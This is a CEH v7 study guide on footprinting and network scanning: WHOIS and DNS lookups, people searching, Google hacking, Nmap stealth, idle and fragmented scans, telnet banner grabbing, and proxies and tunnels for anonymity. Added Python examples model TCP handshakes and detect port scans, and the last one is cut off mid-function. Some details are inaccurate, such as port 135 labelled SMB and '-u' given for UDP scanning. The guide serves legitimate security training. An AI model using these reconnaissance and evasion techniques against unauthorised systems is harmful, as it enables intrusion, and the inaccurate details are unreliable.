
C|EH v7.

( Study Guide )

2) Footprinting
Objectives:
- What is Footprinting?
- Objectives of Footprinting
- Footprinting Threats
- Footprinting Methodology
- Internet Footprinting
- Competitive Intelligence
- WHOIS Footprinting
- People Searching
- DNS Footprinting
- Network Footprinting
- Email Footprinting
- Google Hacking
- Additional Footprinting Tools
- Footprinting Countermeasures
- Footprinting Penetration Testing

What is Footprinting
Footprinting is the term used for collecting information about a target. This is the first step of fully identifying a target in order to begin planning an attack. Footprinting refers to finding the digital and material footprint of information made by a target's existence. The objective of Footprinting is to find as much information as possible about a target from as many sources as you can secure. In malicious hacking and black box ethical hacking, it is important to keep this information gathering secret as well.

Relevant target information includes:
- Domain Name
- User and Group Names
- Network Blocks
- System Names
- IP Addresses
- Employee Details
- Networking Protocols
- Company Directory
- VPN points
- News Articles/Press releases
- Intrusion Detection system running
- System Banners

Footprinting Threats
The threat of Footprinting is that a hacker will find out sensitive information about a target from a publicly accessible source. From the target's perspective it is important to know what information is available to the general public.

Footprinting Methodology

Footprinting begins with finding the target's main URL. Any search engine will usually disclose this website. From this main website you can begin searching for other internal URLs such as intranet.*.com or mail.*.com.

Internet Footprinting
Our practice uses several online tools for finding information that has been, or is currently, loaded on websites. The Wayback Machine keeps a database of when websites have changed their content, organized by date, so that you can view the website as it has progressed over the years. Other tools list connections between websites that share a domain.

Competitive Intelligence
For business intelligence, any financial website will have information on publicly traded companies. Job hunting websites allow for searching by company, which can be used to find out what technical skills they are currently looking for. This allows an intelligent hacker to have an idea where a company may be weak, or if they are looking to expand into new technology.

WHOIS Footprinting
The regional internet registries, such as ARIN for North America, keep a database of information about domain names and who owns them. This information can be used to find a target's block of external IP addresses and may provide information about technical points of contact, including the occasional phone number and email address.


People Searching
After a hacker has information about a company in general, they may require more specific information about people employed by or associated with the target. Using emails listed on internet sources, a hacker may begin profiling social media websites such as Facebook and LinkedIn, looking for more information. More specific information can be found on people searching websites and government websites for court cases, and Google Earth can be used to find location data.

DNS Footprinting
Using online tools such as www.chec…, the publicly available DNS records for a site or IP address can be located. Some systems have more information than others. This information may give a hacker a better understanding of a naming scheme and the organization of a target's computer system.

Network Footprinting
Footprinting the edge network of a target begins with finding the IP range from WHOIS and then using a tool such as traceroute to determine the position of routers and possible DMZs. Traceroute measures hops in the route from one address to another by manipulating the Time to Live of ICMP packets. It is at this point that Footprinting becomes active. Reading information is a passive method. Sending probes such as traceroutes to a target and getting a response back is an active method. Any time you connect with the target it is active footprinting. If you call the automated attendant in the middle of the night to work out the phone tree, this is active.


Email Footprinting
Email tracking can be used to monitor emails sent, when they are read, and from what IP address. Email sending programs can generate random email possibilities such as Jsmith@hackerta… to find out what names are actually in use. Using these techniques it is possible to map out an organization's email structure. This can also be used to learn if there are any rules blocking executables or PDF documents, and any size restrictions. Remember, any phishing emails sent to the mail server address schema is active footprinting.

Google Hacking
Google hacking refers to using the power of the advanced operator options in search engines to find exploitable targets and footprint known targets in a simple fashion. For example, using the intitle operator you can search for websites that have the word "password" in their title, which could give you valuable information about password policies or even a document listing passwords. The hacking website Google Hacking Database has a list of common searches used by hackers, although this information is becoming outdated.

Google Advanced Operators
- [site:]
- [allintitle:]
- [intitle:]
- [inurl:]

Additional Footprinting Tools
In addition to other tools previously mentioned, Maltego is another great footprinting tool. It provides a graphical representation of data. The use of this tool makes it easier to visualize connections found in Footprinting a target and ways of finding relationships that may not have been apparent at first glance. However, it is important to know that Maltego maintains a cache of data that is always the most up to date.



Footprinting Countermeasures
The most important countermeasure to Footprinting is knowing what information is available to outside requests. The information that is available may not be sensitive or worth keeping secret, but if an entity does not know what is available, they cannot make that determination. Proper configuration of network devices can protect from most technical Footprinting. WHOIS information registered should point to a position in the company, not a specific person. Policies should be enacted for the release of information through any channel: web, email, phone communications, and any other method. Once the information is released it will be cataloged and kept in some form somewhere.

Note: The CEH exam expects you to have knowledge of standard ports. Be familiar with:
- 20   FTP data
- 21   FTP control
- 22   SSH
- 23   Telnet
- 25   SMTP
- 53   DNS (TCP and UDP!)
- 69   TFTP
- 80   HTTP
- 88   Kerberos
- 110  POP3
- 135  SMB
- 137  NetBIOS
- 138  NetBIOS
- 139  NetBIOS
- 161  SNMP
- 389  LDAP
- 443  HTTPS
- 636  LDAP over SSL or TLS

Footprinting Pen Testing
First and foremost, get proper written authorization before beginning any Footprinting. For the most part, passive information gathering is legal. However, legal does not always mean ethical as well. After you have written authorization, find out as much as you can about your target using passive techniques, documenting everything you find along the way. Once you have exhausted passive sources, use active sources as anonymously as possible to keep yourself from being noticed. Documentation at this stage will make every other hacking activity easier.

Module 3 Scanning Networks Study Guide
Objectives:
- Definition and Types of Scanning
- Understanding CEH Scanning Methodology
- Checking Live Systems and Open Ports
- Understanding Scanning Techniques
- Different Tools Present to Perform Scanning
- Understanding Banner Grabbing and OS Fingerprinting
- Drawing Network Diagrams and Vulnerable Hosts
- Preparing Proxies
- Understanding Anonymizers
- Scanning Countermeasures
- Scanning Pen Testing

Definitions and Types of Scanning
Network scanning is a procedure for identifying active hosts on a network, either for the purpose of attacking them or for network security assessment. Scanning procedures, such as sweeps and port scans, return information about which IP addresses map to live hosts that are active on the Internet and what services they offer.

Port Scan - An attack that sends client requests to a range of server port addresses on a host, with the goal of finding an active port and exploiting a known vulnerability of that service.
Vulnerability Scan - Designed to assess computers, computer systems, networks or applications for weaknesses.
Network Scan - Identifies active hosts on a network.

Understanding CEH Scanning Methodology
1. Check for Live Systems
2. Check for Open Ports
3. Banner Grabbing
4. Scan for Vulnerability
5. Draw Network Diagrams
6. Prepare Proxies


Checking Live Systems and Open Ports
ICMP Scanning - During most ping scans using ICMP, an ICMP_ECHO datagram is sent to the remote computer to determine whether it has an active IP or not. If all is well, the computer that sent the ICMP_ECHO packet will receive an ICMP_ECHO_REPLY packet, which means that the host computer is up and alive. If no response is received, it usually means that the host computer is down or an administrator is filtering the reply from the host. The simplest of tools to do this is the ping command, which comes with most *nix systems and Windows systems alike.

Ping Sweeps - are used to determine live hosts from a range of IP addresses by sending ICMP ECHO requests to multiple hosts; if they are alive they will respond with an ICMP ECHO reply. It can be used to create an inventory of live systems on a network.

TCP Three Way Handshake - To establish a connection, TCP uses a three-way handshake. Before a client attempts to connect with a server, the server must first bind to a port to open it up for connections: this is called a passive open. Once the passive open is established, a client may initiate an active open. To establish a connection, the three-way (or 3-step) handshake occurs:
1. SYN: The active open is performed by the client sending a SYN to the server. It sets the segment's sequence number to a random value A.
2. SYN-ACK: In response, the server replies with a SYN-ACK. The acknowledgment number is set to one more than the received sequence number (A + 1), and the sequence number that the server chooses for the packet is another random number, B.
3. ACK: Finally, the client sends an ACK back to the server. The sequence number is set to the received acknowledgement value, i.e. A + 1, and the acknowledgement number is set to one more than the received sequence number, i.e. B + 1.
At this point, both the client and server have received an acknowledgment of the connection.

If that didn't sink in, here's another way of thinking about it. The Three Way Handshake is a lot like a phone call. You dial the number (the initial connection, SYN), the recipient picks up the phone ("hello", SYN/ACK), and you respond "Hi there, this is Bill" (ACK). From there you two talk (lots of ACKs). At the end of the conversation one of you says "well, I gotta go" (FIN), the other person says "ok, see you, bye" (FIN/ACK), you say "Bye" (ACK), and the conversation closes by you both putting the phone down. In between there are a bunch of ACK/PSH and ACKs as you two chat. Each part of the conversation is broken down into sentences, if you will. As the two of you transfer data, those sentences are passed back and forth with those ACK/PSH and ACK flags set, and so forth.

Hping2 / Hping3
Hping is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de-facto tools for security auditing and testing of firewalls and networks, and was used to exploit the Idle Scan scanning technique now implemented in the Nmap port scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string based, human readable description of TCP/IP packets, so that the programmer can write scripts related to low level TCP/IP packet manipulation and analysis in a very short time. Like most tools used in computer security, hping is useful to security experts, but there are a lot of applications related to network testing and system administration.

Understanding Scanning Techniques
(-s*) = Switches used in Nmap. Zenmap is the front-end GUI for nmap, very helpful to learn switches.

TCP Connect / Full Open Scan (-sT)
The TCP connect scan is named after the connect call that's used by the operating system to initiate a TCP connection to a remote device. Unlike the TCP SYN scan (-sS), the TCP connect scan uses a normal TCP connection to determine if a port is available. This scan method uses the same TCP handshake connection that every other TCP-based application uses on the network. This scan is very noisy on a network and highly detectable through application event logs. It might be considered the TCP scan of last resort. If privileged access isn't available and determination of open TCP ports is absolutely necessary, however, this scan may be the only method available.

Stealth Scan (Half-Open Scan) (-sS)
The TCP SYN scan uses common methods of port-identification that allow nmap to gather information about open ports without completing the TCP handshake process. When an open port is identified, the TCP handshake is reset before it can be completed. This technique is often referred to as "half open" scanning. The SYN scan is a common scan when looking for open ports on a remote device, and its simple SYN methodology works on all operating systems. Because it only half-opens the TCP connections, it's considered a very clean scan type. The TCP SYN scan never actually creates a TCP session, so it isn't logged by the destination host's applications. This is a much "quieter" scan than the TCP connect scan, and there's less visibility in the destination system's application logs since no sessions are ever initiated.
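The handshake steps above, and the difference between a full-open (-sT) and a half-open (-sS) probe, can be replayed on paper. The following Python is an added example for this guide, not code from the study guide or from Nmap: it tracks the sequence and acknowledgement numbers of constructed SYN / SYN-ACK / ACK / RST segments and reports whether each connection was established, left half-open and reset, or acknowledged with the wrong number. The `Segment` record, the endpoint strings and the initial sequence numbers are this example's own assumptions.

```python
# Added example, not from the study guide: replay TCP control segments and
# report per connection whether the three-way handshake completed (what a
# full-open -sT probe leaves behind) or was reset half-open (the -sS pattern).
# Segment fields, sample addresses and ISNs are constructed for this example.
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    src: str    # "ip:port" of the sender
    dst: str    # "ip:port" of the receiver
    flags: str  # "S" (SYN), "SA" (SYN-ACK), "A" (ACK), "R" (RST)
    seq: int    # sequence number
    ack: int    # acknowledgement number (0 when the ACK flag is not set)


def handshake_segments(client, server, a, b):
    """The textbook exchange with client ISN a and server ISN b."""
    return [
        Segment(client, server, "S", a, 0),           # 1. SYN:     seq = A
        Segment(server, client, "SA", b, a + 1),      # 2. SYN-ACK: seq = B, ack = A + 1
        Segment(client, server, "A", a + 1, b + 1),   # 3. ACK:     seq = A + 1, ack = B + 1
    ]


def track(segments):
    """Replay segments; return {(client, server): final state}."""
    states = {}
    isns = {}  # (client, server) -> [A, B], used to validate the numbers
    for s in segments:
        if s.flags == "S":
            key = (s.src, s.dst)
            states[key] = "syn_sent"
            isns[key] = [s.seq, None]
        elif s.flags == "SA":
            key = (s.dst, s.src)  # the server answers, so the client is s.dst
            if states.get(key) == "syn_sent" and s.ack == isns[key][0] + 1:
                states[key] = "syn_received"
                isns[key][1] = s.seq
        elif s.flags == "A":
            key = (s.src, s.dst)
            if states.get(key) == "syn_received":
                a, b = isns[key]
                ok = s.seq == a + 1 and s.ack == b + 1
                states[key] = "established" if ok else "bad_ack"
        elif s.flags == "R":
            key = (s.src, s.dst)
            if states.get(key) == "syn_received":
                # SYN, SYN-ACK, then RST from the initiator: the half-open
                # pattern a SYN scan leaves; no application ever sees a session.
                states[key] = "half_open_reset"
    return states


CLIENT, SERVER = "10.0.0.5:40001", "10.0.0.9:80"   # constructed endpoints
FULL_OPEN = handshake_segments(CLIENT, SERVER, 1000, 5000)
HALF_OPEN = FULL_OPEN[:2] + [Segment(CLIENT, SERVER, "R", 1001, 0)]
WRONG_ACK = FULL_OPEN[:2] + [Segment(CLIENT, SERVER, "A", 1001, 5000)]

if __name__ == "__main__":
    for name, segs in (("full open", FULL_OPEN), ("half open", HALF_OPEN), ("wrong ack", WRONG_ACK)):
        print(f"{name:10s} -> {track(segs)[(CLIENT, SERVER)]}")
```

Running it prints `established`, `half_open_reset` and `bad_ack` for the three constructed exchanges. The half-open case is the one worth remembering from a defender's side: the server's kernel saw SYN and SYN-ACK, but no application ever got a socket, which is why the guide says the SYN scan leaves nothing in application logs and has to be caught at the packet or firewall level instead.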


The SYN Scan requires privileged access to the system. Without privileged access, nmap cannot create the raw packets necessary for this half-open scan. The SYN scan only provides open, closed, or filtered port information. To determine operating system or process version information, more intrusive scanning is required, such as the version scan (-sV) or the operating system fingerprinting (-O) option.

Xmas Scan (-sX), FIN Scan (-sF), and NULL Scan (-sN)
These three scans are grouped together because their individual functionality is very similar. These are called "stealth" scans because they send a single frame to a TCP port without any TCP handshaking or additional packet transfers. This is a scan type that sends a single frame with the expectation of a single response. The differences between them are how the TCP flags are set:
- Xmas: FIN/URG/PUSH flags
- FIN: FIN flag
- Null: No flags set

The XMAS Scan (-sX) sends a TCP frame to a remote device with the FIN, URG, PUSH flags set. This is called a Xmas tree scan because of the alternating bits turned on and off in the flags byte (00101001), much like the lights of a Christmas tree.

The FIN Scan (-sF) - The TCP FIN scan identifies listening TCP port numbers based on how the target device reacts to a transaction close request for a TCP port (even though no connection may exist before these close requests are made). This type of scan can get through basic firewalls and boundary routers that filter on incoming TCP packets with the Finish (FIN) and ACK flag combinations. The TCP packets used in this scan include only the TCP FIN flag setting.

The Null Scan (-sN) is a type of TCP scan that hackers, both ethical and malicious, use to identify listening TCP ports. In the right hands, a Null Scan can help identify potential holes for server hardening, but in the wrong hands, it is a reconnaissance tool. It is a pre-attack probe. A Null Scan is a series of TCP packets that contain a sequence number of 0 and no set flags. In a production environment, there will never be a TCP packet that doesn't contain a flag. Because the Null Scan does not contain any set flags, it can sometimes penetrate firewalls and edge routers that filter incoming packets with particular flags. The expected result of a Null Scan on an open port is no response. Since there are no flags set, the target will not know how to handle the request. It will discard the packet and no reply will be sent. If the port is closed, the target will send an RST packet in response.

The IDLE Scan
The IDLE scan (-sI) is the ultimate stealth scan but can be more time consuming. You also need to locate a zombie workstation/network device that is IDLE, hence the name. If the zombie is not idle and has other network traffic, it will bump up its IP ID sequence and disrupt the scan logic. The lower the latency between the attacker and the zombie, and between the zombie and the target, the faster the scan will proceed. Simple network devices such as printers often make great zombies because they are commonly both underused (idle) and built with simple network stacks which are vulnerable to IP ID traffic detection.
Open Port: Using a spoofed zombie IP address you will send a SYN packet to the target; if the target's port is open, it will send a SYN/ACK to the zombie. The zombie will respond to the SYN/ACK with a RST packet, bumping up its IP ID by 1.
Closed Port: If the port is closed, your SYN packet spoofing the zombie's IP address will cause the target machine to respond with a RST packet. The zombie will not respond to the RST packet, and the IP ID will not be incremented.

ICMP Echo Scanning / List Scan
The ICMP Echo scan (-sP) is the most simplistic discovery method and the easiest to detect. By sending a series of ICMP echo request (ICMP type 8) packets to various IP addresses, a hacker can determine which systems are active (or "alive"). Knowing that Intrusion Detection Systems (IDSs) are designed to catch this type of discovery sequence, hackers vary the destination devices or delay the ping interval by minutes, hours, or even days.

-sL (List Scan)
The list scan is a degenerate form of host discovery that simply lists each host of the network(s) specified, without sending any packets to the target hosts. By default, Nmap still does reverse-DNS resolution on the hosts to learn their names. It is often surprising how much useful information simple hostnames give out. For example, fw.chi is the name of one company's Chicago firewall. Nmap also reports the total number of IP addresses at the end. The list scan is a good sanity check to ensure that you have proper IP addresses for your targets. If the hosts sport domain names you do not recognize, it is worth investigating further to prevent scanning the wrong company's network.

SYN/FIN Scanning Using IP Fragments (-f)
Fragmentation scanning: This is not a new scanning method in and of itself, but a modification of other techniques. Instead of just sending the probe packet, you break it up into a couple of small IP fragments. You are splitting up the TCP header over several packets to make it harder for packet filters and so forth to detect what you are doing. Be careful with this! Some programs have trouble handling these tiny packets. The -f option instructs the specified SYN or FIN scan to use tiny fragmented packets.

UDP Scanning
This scanning method varies from the above in that we are using the UDP protocol instead of TCP. While this protocol is simpler, scanning it is actually significantly more difficult. This is because open ports don't have to send an acknowledgement in response to our probe, and closed ports aren't even required to send an error packet. Fortunately, most hosts do send an ICMP_PORT_UNREACH error when you send a packet to a closed UDP port. Thus you can find out if a port is NOT open, and by exclusion determine which ports are. Neither UDP packets nor the ICMP errors are guaranteed to arrive, so UDP scanners of this sort must also implement retransmission of packets that appear to be lost (or you will get a bunch of false positives).

Also, you will need to be root for access to the raw ICMP socket necessary for reading the port unreachable. The -u (UDP) option of nmap implements this scanning method for root users.

Some think UDP scanning is pointless; however, you may come across holes where services are running on undocumented higher UDP ports. While some lower ports may be blocked, you may be successful with scanning higher ports.

Inverse TCP Flag Scanning
Filtering and other security systems such as firewalls and IDS can detect SYN packets, and there are programs available that can detect half-open SYN Flag scan attempts as well. Probe packets with strange TCP Flags set can sometimes pass through undetected, depending on the security mechanisms in place. Using malformed TCP flags to probe a target is known as an inverted technique because responses are sent back only by closed ports. RFC 793 states that if a port is closed on a host, an RST/ACK packet should be sent to reset the connection. To take advantage of this feature, attackers send TCP probe packets with various TCP flags set. A TCP probe packet is sent to each port of the target host. Three types of probe packet flag configurations are normally used:
- A FIN probe with the FIN TCP flag set
- An XMAS probe with the FIN, URG, and PUSH TCP flags set
- A NULL probe with no TCP flags set

RFC standard 793 states that if no response is seen from the target port, either the port is open or the server is down. This scanning method isn't necessarily the most accurate, but it is stealthy; it sends garbage that usually won't be picked up to each port.

For all closed ports on the target host, RST/ACK packets are received. However, some operating platforms (such as those in the Microsoft Windows family) disregard the RFC 793 standard, so no RST/ACK response is seen when an attempt is made to connect to a closed port. Hence, this technique is effective against some Unix-based platforms.

ACK Flag Scanning (-sA)
A stealthy technique is that of identifying open TCP ports by sending ACK probe packets and analyzing the header information of the RST packets received from the target host. This technique exploits vulnerabilities within the BSD-derived TCP/IP stack and is therefore only effective against certain operating systems and platforms. There are two main ACK scanning techniques:
- Analysis of the time-to-live (TTL) field of received packets
- Analysis of the WINDOW field of received packets

These techniques can also check filtering systems and complicated networks to understand the processes packets go through on the target network. For example, the TTL value can be used as a marker of how many systems the packet has hopped through.
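The Xmas, FIN, NULL and ACK probes described in the last few sections are all defined by their flag byte, which makes them easy to pick out of traffic once you think in terms of that byte. The Python below is an added example, not code from the study guide or from any scanner: it turns a flag string into the bitmask layout of the TCP flags field (the Xmas pattern really is 00101001, as the guide says), classifies each probe the way a host-based detector would, counts probes per source over constructed packet records, and models the RFC 793 reply behaviour the text describes, with a `conforming` switch standing in for the Windows-style stacks that stay silent on closed ports. The record layout and sample addresses are this example's own assumptions.

```python
# Added example, not from the study guide: classify TCP probes by flag
# combination, as a host-based detector would, and model the RFC 793 replies
# the guide describes. Sample records are constructed; the "conforming"
# switch stands in for stacks (e.g. Windows, per the guide) that send no
# RST/ACK for an inverse probe to a closed port.
from collections import Counter

FLAG_BITS = {"F": 0x01, "S": 0x02, "R": 0x04, "P": 0x08, "A": 0x10, "U": 0x20}
XMAS = FLAG_BITS["F"] | FLAG_BITS["U"] | FLAG_BITS["P"]   # 0x29 == 0b00101001


def parse_flags(flag_str):
    """'FPU' -> bitmask laid out like the low byte of the TCP flags field."""
    mask = 0
    for ch in flag_str:
        mask |= FLAG_BITS[ch]
    return mask


def classify_probe(flag_str):
    mask = parse_flags(flag_str)
    if mask == 0:
        return "null_probe"
    if mask == XMAS:
        return "xmas_probe"
    if mask == FLAG_BITS["F"]:
        return "fin_probe"
    if mask == FLAG_BITS["A"]:
        return "ack_probe"   # lone ACK with no session: the -sA pattern
    if mask == FLAG_BITS["S"]:
        return "syn"         # an ordinary connection attempt (or -sS / -sT)
    return "normal"


def rfc793_response(flag_str, port_open, conforming=True):
    """Flags of the reply a stack sends to one probe, or None for silence."""
    kind = classify_probe(flag_str)
    if kind in ("null_probe", "fin_probe", "xmas_probe"):
        if port_open or not conforming:
            return None      # open port drops it; non-conforming stack is silent either way
        return "RA"          # closed port on a conforming stack: RST/ACK
    if kind == "syn":
        return "SA" if port_open else "RA"
    if kind == "ack_probe":
        return "R"           # RST regardless; the ACK scan reads TTL/window, not port state
    return None


# Constructed packet records: (src, dst, dst_port, flags)
SAMPLE = [
    ("203.0.113.7", "192.0.2.10", 21, "FPU"),
    ("203.0.113.7", "192.0.2.10", 22, "FPU"),
    ("203.0.113.7", "192.0.2.10", 80, "FPU"),
    ("203.0.113.7", "192.0.2.10", 443, ""),
    ("198.51.100.4", "192.0.2.10", 25, "F"),
    ("192.0.2.55", "192.0.2.10", 443, "S"),     # a normal client opening a session
    ("192.0.2.55", "192.0.2.10", 443, "PA"),    # data inside that session
]


def probe_summary(records):
    """Count flag-only probes per (source, probe type); ordinary traffic is ignored."""
    counts = Counter()
    for src, _dst, _port, flags in records:
        kind = classify_probe(flags)
        if kind.endswith("_probe"):
            counts[(src, kind)] += 1
    return counts


if __name__ == "__main__":
    for (src, kind), n in sorted(probe_summary(SAMPLE).items()):
        print(f"{src:14s} {kind:12s} {n}")
```

On the constructed records the summary attributes three Xmas probes and one NULL probe to 203.0.113.7 and one FIN probe to 198.51.100.4, while the legitimate SYN and PSH/ACK traffic from 192.0.2.55 is not counted. The `rfc793_response` model also makes the guide's caveat concrete: against a non-conforming stack the closed port and the open port both answer with silence, so the inverse technique cannot tell them apart there.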

Different Tools Present to Perform Scanning
IP Fragmentation tools: Fragtest, Fragroute for fragmenting probe packets.
Nmap: Free, open source utility for network exploration/mapping. Nmap will extract information such as:
- Live hosts on a network
- Services (application names and versions)
- Operating Systems (OS versions)
- Type of packet filters/firewalls
SuperScan: is a powerful TCP port scanner that includes a variety of additional networking tools like ping, traceroute, HTTP HEAD, WHOIS and more. It uses multi-threaded and asynchronous techniques, resulting in extremely fast and versatile scanning.

Understanding Banner Grabbing and OS Fingerprinting
OS Fingerprinting determines what operating system is running on a remote target system. There are two types of OS Fingerprinting: Active and Passive.
Active OS Fingerprinting uses specially crafted packets sent to the remote OS, and the response is compared with a database to determine the OS. Responses from different Operating Systems vary due to differences in TCP/IP stack implementation.
Passive OS Fingerprinting uses sniffing techniques to capture packets flowing from the system. Captured packets are then analyzed for OS information. It is also based on variations of how the TCP/IP Stack is implemented.

Banner Grabbing
Banner Grabbing is an enumeration technique used to glean information about computer systems on a network and the services running on its open ports. Administrators can use this to take inventory of the systems and services on their network. An intruder, however, can use banner grabbing in order to find network hosts that are running versions of applications and operating systems with known exploits. A telnet client can be used for banner grabbing:
  telnet [target ip or URL] [port]
  telnet [target] 80
Then you may use GET or HEAD commands in your telnet session; the HEAD command will suffice for fingerprinting, e.g.:
  HEAD / HTTP/1.0

Banner grabbing from error pages
Typing in a URL that does not exist on a server can result in an error page listing server information.
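The administrator's side of banner grabbing is checking what your own HEAD / HTTP/1.0 reply gives away. The Python below is an added example, not code from the study guide: it parses a raw HTTP response of the kind a telnet session shows, pulls out the headers that commonly carry product versions, and reports which of them disclose a version string, using one verbose and one hardened response that are both constructed here. The header list and the version pattern are this example's own assumptions.

```python
# Added example, not from the study guide: parse the raw reply a HEAD / HTTP/1.0
# request produces and report which headers disclose software versions, so an
# administrator can check their own servers for the information the guide says
# an intruder looks for. Both responses below are constructed.
import re

VERSION_RE = re.compile(r"[A-Za-z][\w.-]*/\d+(?:\.\d+)+")   # e.g. Apache/2.2.15
DISCLOSING_HEADERS = ("server", "x-powered-by", "x-aspnet-version")


def parse_head_response(raw):
    """Split a raw HTTP response into (status_line, {lowercased header: value})."""
    head, _sep, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    status_line = lines[0]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status_line, headers


def version_disclosures(headers):
    """List (header, value) pairs whose value carries a product/version string."""
    findings = []
    for name in DISCLOSING_HEADERS:
        value = headers.get(name)
        if value and VERSION_RE.search(value):
            findings.append((name, value))
    return findings


VERBOSE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Wed, 01 May 2024 10:00:00 GMT\r\n"
    "Server: Apache/2.2.15 (CentOS)\r\n"
    "X-Powered-By: PHP/5.3.3\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Wed, 01 May 2024 10:00:00 GMT\r\n"
    "Server: Apache\r\n"          # product name only, no version
    "Content-Type: text/html\r\n"
    "\r\n"
)


def audit(raw):
    """Status line plus the disclosing headers found in one response."""
    status, headers = parse_head_response(raw)
    return {"status": status, "disclosures": version_disclosures(headers)}


if __name__ == "__main__":
    for label, raw in (("verbose", VERBOSE_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit(raw))
```

The verbose reply is reported with two findings (the `Server` and `X-Powered-By` values), the hardened one with none. Pasting the output of a real HEAD request into `audit` is a quick way to confirm that a server's banner has actually been trimmed after a configuration change.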

Drawing Network Diagrams and Vulnerable Hosts
Vulnerability scanning - Identifies vulnerabilities and weaknesses of a system and network in order to determine how a system can be exploited. Scanning tools: Saint, Nessus and Core Impact.
Network Diagrams - The physical network topology can be directly represented in a network diagram, as it is simply the diagram with network nodes and connections as undirected or directed edges (depending on the type of connection). The logical network topology can be inferred from the network diagram if details of the network protocols in use are also given.

Preparing Proxies
Proxy Server - a proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server requesting some service such as a file, connection, web page, or other resource available from a different server. The proxy server then evaluates the request according to its filtering rules. There are thousands of free public proxy servers that are easily found on Google. Attackers use them for scanning and attacking anonymously. SocksChain is a program that allows a user to work with any Internet service through a chain of SOCKS or HTTP proxies to hide the real IP address.

TOR (The Onion Routing) Proxy Chaining software
Tor is a system intended to enable online anonymity. Tor client software routes Internet traffic through a worldwide volunteer network of servers in order to conceal a user's location or usage from someone conducting network surveillance or traffic analysis. Using Tor makes tracing Internet activity, including "visits to Web sites, online posts, instant messages and other communication forms", back to the user more difficult.[7] It is intended to protect users' personal freedom, privacy, and ability to conduct confidential business, by keeping their internet activities from being monitored.[8] The software is open-source and the network is free of charge to use.

HTTP Tunneling
HTTP Tunneling is a technique by which communications performed using various network protocols are encapsulated using the HTTP protocol, the network protocols in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a covert channel that the network protocol being tunneled uses to communicate. The HTTP stream with its covert channel is termed an HTTP Tunnel. HTTP Tunnel software consists of client-server HTTP Tunneling applications that integrate with existing application software, permitting them to be used in conditions of restricted network connectivity, including firewalled networks and networks behind proxy servers.

SSH Tunneling
A Secure Shell (SSH) tunnel consists of an encrypted tunnel created through an SSH protocol connection. Users may set up SSH tunnels to transfer unencrypted traffic over a network through an encrypted channel. To set up an SSH tunnel, one configures an SSH client to forward a specified local port to a port on the remote machine. Once the SSH tunnel has been established, the user can connect to the specified local port to access the network service. The local port need not have the same port number as the remote port.

SSH tunnels provide a means to bypass firewalls that prohibit certain Internet services so long as a site allows outgoing connections. For example, an organization may prohibit a user from accessing Internet web pages (port 80) directly without passing through the organization's proxy filter (which provides the organization with a means of monitoring and controlling what the user sees through the web). But users may not wish to have their web traffic monitored or blocked by the organization's proxy filter. If users can connect to an external SSH server, they can create an SSH tunnel to forward a given port on their local machine to port 80 on a remote web server. To access the remote web server, users would point their browser to the local port at http://localhost/.

SSL Proxy
You probably know secure HTTP from secure websites. Say you want to operate a secure web server but have only a normal server. SSL Proxy can be your solution: it's plugged into the connection between the client and the server and adds Secure Socket Layer (SSL) support. Or the other way around: you have an ordinary telnet client but want to connect to a secure site. Just start SSL Proxy with the appropriate parameters and you're good to go. That's what SSL Proxy can do for you.

Understanding Anonymizers
Anonymizer - An anonymizer or an anonymous proxy is a tool that attempts to make activity on the Internet untraceable. It is a proxy server computer that acts as an intermediary and privacy shield between a client computer and the rest of the Internet. It accesses the Internet on the user's behalf, protecting personal information by hiding the client computer's identifying information.

IP Address Spoofing
IP address spoofing or IP spoofing refers to the creation of Internet Protocol (IP) packets with a forged source IP address, called spoofing, with the purpose of concealing the identity of the sender or impersonating another computing system.

Scanning Countermeasures
Ethical hackers use their tool set to test the scanning countermeasures that have been implemented. Once a firewall is in place, a port-scanning tool should be run against hosts on the network to determine whether the firewall correctly detects and stops the scanning activity. The firewall should be able to detect the probes sent by port-scanning tools. The firewall should carry out stateful inspections, which means it examines the data of the packet and not just the TCP header to determine whether the traffic is allowed to pass through the firewall. Network IDS should be used to identify the OS-detection method used by some common hacker tools, such as Nmap. Only needed ports should be kept open. The rest should be filtered or blocked. The staff of the organization using the systems should be given appropriate training on security awareness.
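Whether the firewall "correctly detects" a scan is something you can only judge if you look at its logs the way a detector does. The Python below is an added example, not code from the study guide or from any firewall product: it parses constructed log lines in an iptables-like `SRC= DST= PROTO= DPT=` layout (an assumption of this example), keeps a sliding time window per source address, and raises one alert when a source has touched at least a threshold number of distinct destination ports inside that window. The sample log deliberately includes a fast scanner, a scanner that spaces its probes minutes apart (the interval-delay evasion the guide mentions under ICMP Echo scanning) and a normal client, so the effect of the window and threshold settings is visible.

```python
# Added example, not from the study guide: a small port-scan detector run over
# constructed firewall log lines (an iptables-like format assumed here). It
# alerts when one source touches at least `threshold` distinct destination
# ports inside a sliding window of `window_s` seconds.
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\w+) SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) "
    r"PROTO=(?P<proto>\w+) DPT=(?P<dpt>\d+)"
)


def parse_line(line):
    """Return a dict of fields, or None for lines in an unexpected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "action": m["action"],
        "src": m["src"],
        "dst": m["dst"],
        "proto": m["proto"],
        "dpt": int(m["dpt"]),
    }


def detect_port_scans(lines, window_s=60, threshold=5):
    """Return [(src, alert_time, sorted distinct ports)], at most one alert per source."""
    recent = defaultdict(deque)   # src -> deque of (ts, dpt), oldest first
    alerts, alerted = [], set()
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["src"]]
        q.append((ev["ts"], ev["dpt"]))
        while (ev["ts"] - q[0][0]).total_seconds() > window_s:
            q.popleft()               # drop events that fell out of the window
        ports = {p for _, p in q}
        if len(ports) >= threshold and ev["src"] not in alerted:
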